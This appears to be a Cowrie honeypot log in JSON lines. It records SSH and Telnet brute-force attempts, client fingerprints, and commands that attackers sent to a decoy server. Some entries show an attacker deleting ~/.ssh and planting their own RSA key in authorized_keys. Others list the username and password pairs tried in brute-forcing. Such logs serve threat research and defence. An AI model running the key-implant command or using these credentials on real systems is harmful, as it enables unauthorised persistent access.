{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:58:33.799517Z","src_ip":"212.227.235.229","session":"4ea0bf939504"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:58:34.339565Z","src_ip":"170.64.166.123","session":"d3787271fe91"}
{"eventid":"cowrie.session.closed","duration":"8.1","message":"Connection lost after 8.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:58:34.620791Z","src_ip":"170.64.166.123","session":"2ca4b7260ea9"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:58:34.621816Z","src_ip":"170.64.166.123","session":"d3787271fe91"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T05:58:34.922351Z","src_ip":"212.227.235.229","session":"4ea0bf939504"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:58:36.195771Z","src_ip":"212.227.235.229","session":"4ea0bf939504"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36200,"dst_ip":"1.2.3.4","dst_port":22,"session":"57e7429b13a3","protocol":"ssh","message":"New connection: 212.227.235.229:36200 (1.2.3.4:22) [session: 57e7429b13a3]","sensor":"my-vps","timestamp":"2025-08-31T05:58:36.482691Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:58:36.483722Z","src_ip":"212.227.235.229","session":"57e7429b13a3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:58:36.767710Z","src_ip":"212.227.235.229","session":"57e7429b13a3"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:58:37.947269Z","src_ip":"212.227.235.229","session":"57e7429b13a3"}
{"eventid":"cowrie.session.closed","duration":"8.5","message":"Connection lost after 8.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:58:38.229395Z","src_ip":"212.227.235.229","session":"6fef1323349a"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:58:38.232659Z","src_ip":"212.227.235.229","session":"57e7429b13a3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50974,"dst_ip":"1.2.3.4","dst_port":22,"session":"6969aa267a66","protocol":"ssh","message":"New connection: 212.227.235.229:50974 (1.2.3.4:22) [session: 6969aa267a66]","sensor":"my-vps","timestamp":"2025-08-31T05:58:38.558540Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35588,"dst_ip":"1.2.3.4","dst_port":22,"session":"df02b23c763b","protocol":"ssh","message":"New connection: 212.227.125.160:35588 (1.2.3.4:22) [session: df02b23c763b]","sensor":"my-vps","timestamp":"2025-08-31T05:58:39.031623Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:58:39.534996Z","src_ip":"212.227.125.160","session":"df02b23c763b"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:58:39.536134Z","src_ip":"212.227.125.160","session":"df02b23c763b"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:58:39.558163Z","src_ip":"212.227.235.229","session":"6969aa267a66"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:58:39.559938Z","src_ip":"212.227.235.229","session":"6969aa267a66"}
{"eventid":"cowrie.login.failed","username":"test3","password":"12345678","message":"login attempt [test3/12345678] failed","sensor":"my-vps","timestamp":"2025-08-31T05:58:42.161776Z","src_ip":"212.227.125.160","session":"df02b23c763b"}
{"eventid":"cowrie.login.failed","username":"es","password":"es","message":"login attempt [es/es] failed","sensor":"my-vps","timestamp":"2025-08-31T05:58:43.507363Z","src_ip":"212.227.235.229","session":"6969aa267a66"}
{"eventid":"cowrie.session.closed","duration":"4.7","message":"Connection lost after 4.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:58:43.729848Z","src_ip":"212.227.125.160","session":"df02b23c763b"}
{"eventid":"cowrie.session.closed","duration":"6.7","message":"Connection lost after 6.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:58:45.266588Z","src_ip":"212.227.235.229","session":"6969aa267a66"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41938,"dst_ip":"1.2.3.4","dst_port":22,"session":"5ec5910e20e6","protocol":"ssh","message":"New connection: 212.227.125.160:41938 (1.2.3.4:22) [session: 5ec5910e20e6]","sensor":"my-vps","timestamp":"2025-08-31T05:58:56.827066Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:59:02.751842Z","src_ip":"212.227.125.160","session":"5ec5910e20e6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:59:02.752676Z","src_ip":"212.227.125.160","session":"5ec5910e20e6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41802,"dst_ip":"1.2.3.4","dst_port":22,"session":"4d7d70d5dfea","protocol":"ssh","message":"New connection: 212.227.235.229:41802 (1.2.3.4:22) [session: 4d7d70d5dfea]","sensor":"my-vps","timestamp":"2025-08-31T05:59:10.642616Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:59:10.643585Z","src_ip":"212.227.235.229","session":"4d7d70d5dfea"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:59:10.932606Z","src_ip":"212.227.235.229","session":"4d7d70d5dfea"}
{"eventid":"cowrie.login.success","username":"root","password":"Qaz123456@","message":"login attempt [root/Qaz123456@] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:59:12.131076Z","src_ip":"212.227.235.229","session":"4d7d70d5dfea"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34026,"dst_ip":"1.2.3.4","dst_port":22,"session":"a802118dae3c","protocol":"ssh","message":"New connection: 212.227.235.229:34026 (1.2.3.4:22) [session: a802118dae3c]","sensor":"my-vps","timestamp":"2025-08-31T05:59:12.270196Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:59:12.729956Z","src_ip":"212.227.235.229","session":"4d7d70d5dfea"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:59:12.730630Z","src_ip":"212.227.235.229","session":"4d7d70d5dfea"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:59:12.731783Z","src_ip":"212.227.235.229","session":"4d7d70d5dfea"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:59:13.022305Z","src_ip":"212.227.235.229","session":"4d7d70d5dfea"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:59:13.660000Z","src_ip":"212.227.235.229","session":"4d7d70d5dfea"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T05:59:13.660779Z","src_ip":"212.227.235.229","session":"4d7d70d5dfea"}
{"eventid":"cowrie.session.connect","src_ip":"43.159.36.188","src_port":45912,"dst_ip":"1.2.3.4","dst_port":22,"session":"78032497d679","protocol":"ssh","message":"New connection: 43.159.36.188:45912 (1.2.3.4:22) [session: 78032497d679]","sensor":"my-vps","timestamp":"2025-08-31T05:59:13.761626Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:59:13.762562Z","src_ip":"43.159.36.188","session":"78032497d679"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T05:59:13.952316Z","src_ip":"212.227.235.229","session":"4d7d70d5dfea"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:59:13.953259Z","src_ip":"212.227.235.229","session":"4d7d70d5dfea"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:59:14.014973Z","src_ip":"43.159.36.188","session":"78032497d679"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43380,"dst_ip":"1.2.3.4","dst_port":22,"session":"50575832e750","protocol":"ssh","message":"New connection: 212.227.235.229:43380 (1.2.3.4:22) [session: 50575832e750]","sensor":"my-vps","timestamp":"2025-08-31T05:59:14.236926Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:59:14.239096Z","src_ip":"212.227.235.229","session":"50575832e750"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:59:14.525434Z","src_ip":"212.227.235.229","session":"50575832e750"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47400,"dst_ip":"1.2.3.4","dst_port":23,"session":"e36fa9bc1216","protocol":"telnet","message":"New connection: 212.227.125.160:47400 (1.2.3.4:23) [session: e36fa9bc1216]","sensor":"my-vps","timestamp":"2025-08-31T05:59:14.611512Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:59:14.699561Z","src_ip":"212.227.125.160","session":"e36fa9bc1216"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:59:14.721685Z","src_ip":"212.227.125.160","session":"e36fa9bc1216"}
{"eventid":"cowrie.login.failed","username":"samson","password":"samson","message":"login attempt [samson/samson] failed","sensor":"my-vps","timestamp":"2025-08-31T05:59:15.085289Z","src_ip":"43.159.36.188","session":"78032497d679"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T05:59:15.711329Z","src_ip":"212.227.235.229","session":"50575832e750"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:59:16.338882Z","src_ip":"43.159.36.188","session":"78032497d679"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51752,"dst_ip":"1.2.3.4","dst_port":22,"session":"9cc1d7384503","protocol":"ssh","message":"New connection: 212.227.235.229:51752 (1.2.3.4:22) [session: 9cc1d7384503]","sensor":"my-vps","timestamp":"2025-08-31T05:59:16.443700Z"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:59:17.000410Z","src_ip":"212.227.235.229","session":"50575832e750"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:59:17.190309Z","src_ip":"212.227.235.229","session":"9cc1d7384503"}
